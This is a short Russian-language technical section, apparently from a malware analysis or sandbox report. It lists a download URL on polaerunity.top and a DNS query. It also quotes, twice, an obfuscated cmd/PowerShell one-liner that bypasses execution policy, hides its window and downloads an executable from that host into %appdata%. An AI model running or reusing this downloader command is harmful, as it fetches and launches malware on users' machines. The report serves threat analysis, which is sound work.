Техническая информация
- http://polaerunity.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWersHEll.Exe -eXEcUTioNPOLiCY bYpASS -NOPROfIle -WiNDoWSTyLE HiddEn (NeW-oBJeCt sYstEm.nET.WEbCLIENT).doWNlOAdfiLe('http://polaerunity.top/search.php','%appdAta%.EXE');st...
- DNS ASK po###runity.top
- '<SYSTEM32>\cmd.exe' /c "POWersHEll.Exe -eXEcUTioNPOLiCY bYpASS -NOPROfIle -WiNDoWSTyLE HiddEn (NeW-oBJeCt sYstEm.nET.WEbCLIENT).doWNlOAdfiLe('http://polaerunity.top/search.php','%appdAta%.EXE');st...' (со скрытым окном)